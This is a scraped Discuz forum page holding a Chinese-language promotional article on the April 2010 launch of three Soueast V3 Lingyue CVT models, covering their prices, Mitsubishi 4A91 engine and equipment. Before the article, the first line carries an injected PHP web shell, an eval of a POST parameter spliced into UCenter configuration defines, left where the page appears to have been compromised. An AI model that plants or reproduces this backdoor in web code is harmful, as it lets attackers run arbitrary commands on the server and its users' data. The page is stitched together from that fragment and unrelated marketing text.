');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); V3菱悅CVT上市 3款車型官方售價7.79萬起 - 新車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

V3菱悅CVT上市 3款車型官方售價7.79萬起

2010年4月,備受消費者關注與期待的東南汽車V3菱悅CVT車型正式上市,共推出3款車型,分別為豪華版CVT、旗艦版CVT和風采版CVT,最低售價7.79萬元。憑借超值起步價、豐富的配備以及卓越的品質,V3菱悅不僅創造了8萬元以下同級別車型搭配CVT無級變速器的性價比新高,三款CVT車型的上市,進一步完善了產品體系,也為追求舒適性與操控性兼備的消費者帶來更全面的選擇。

車型
官方指導價

V3菱悅豪華版CVT
7.79萬

V3菱悅旗艦版CVT
8.19萬

V3菱悅風采版CVT
8.59萬



  作為東南汽車高起點自主研發的車型,V3菱悅自2008年底上市以來,憑借卓越的品質與超高性價比受到了消費者的熱捧,不僅贏得了良好的市場口碑和2009年的持續熱銷,在2010年年初更迎來了近萬台的月銷量成績。積極進取的東南汽車並未滿足現狀,投入了大量的資金和人力用於新產品的開發,經過嚴苛的品質測試,搭載新一代帶6速手自一體模式智能CVT無級變速器的V3菱悅終於載譽新生。




  隨著城市化的高速發展、用車環境的日漸擁堵和高油價時代的來臨,更具燃油經濟性和操控便利性的CVT無級變速器正逐漸取代傳統自動檔,成為車壇新寵,並運用於諸多高端車型。而V3菱悅CVT車型所搭載的CVT無級變速器更是新一代的高科技含量產品,由全球3大變速箱集團之一——德國ZF旗下歐洲全資公司生產,帶6速手自一體並兼備了雪地、運動等多種智能模式,能根據駕駛者的需求和不同路況,自動切換到最佳的傳動比,創造極為順暢、無頓挫的舒適旅程。在雪地、泥濘、濕滑路況下,只要按下雪地模式開關,系統即強制性減少進油量,降低發動機轉速,使車輛減速,確保在惡劣路況下安全行車。而在D檔模式向左切換到「S」運動模式時,儀表屏上「SPORT」指示燈立即亮起,三菱4A91發動機沉穩的爆發出更為強勁的動力輸出,讓人充分領略高速行駛的運動樂趣。



  值得一提的是,V3菱悅CVT三款車型均搭載三菱全新全鋁4A91 1.5L發動機,採用MIVEC可變氣門正時技術,最大功率88KW,最大扭矩達到了143Nm/4000rpm。該發動機是三菱目前在全球最先進的小排量發動機,實現了輕量化的效果,進一步提高了車輛運動散熱能力、加速性能與燃油經濟性。這樣的領先動力匹配新一代CVT無級變速系統,兩個不同領域最先進技術的同時運用,帶來了相輔相成的加分效果,能實現極佳的燃油經濟性和動力性。數據顯示,V3菱悅CVT車型油耗與V3菱悅MT車型相當,同級車中無出其右,這對於消費者而言無疑是節省錢包的最佳福音。




  此外,V3菱悅CVT全系車型除了擁有超越同級車的無鑰匙啟動系統、遙控尾門開啟、帶MP3接口的高保真音響系統、四輪碟剎、五連桿獨立後懸掛等豐富配備外,還換載了更具動感時尚氣息的全新炮筒式儀表盤和高質感15寸動感7幅鋁圈。旗艦版CVT和風采版CVT還升級加裝了主要運用於中高級轎車的定速巡航系統,而V3菱悅CVT也成為同級別中唯一搭載該配備的車型,進一步提升了整車性價比,在同級車中的競爭力更勝一籌。另外,V3菱悅推出CVT車型的同時,MT產品也全面升級,5.98萬元啟航版配備15寸鋁圈,實現全車系准配195R15鋁圈;而V3菱悅旗艦版及風采版車型均可選裝DVD+NAVI、倒車CCD影像監視系統,營造更為舒適的出行氛圍。

  可以說,V3菱悅CVT車型的上市是東南汽車提升自主品牌影響力的重要舉措,進一步實現產品多元化佈局,為消費者帶來更多的選擇。隨著CVT車型的上市,V3菱悅全系的單月銷量也將向萬輛俱樂部挺進。
返回列表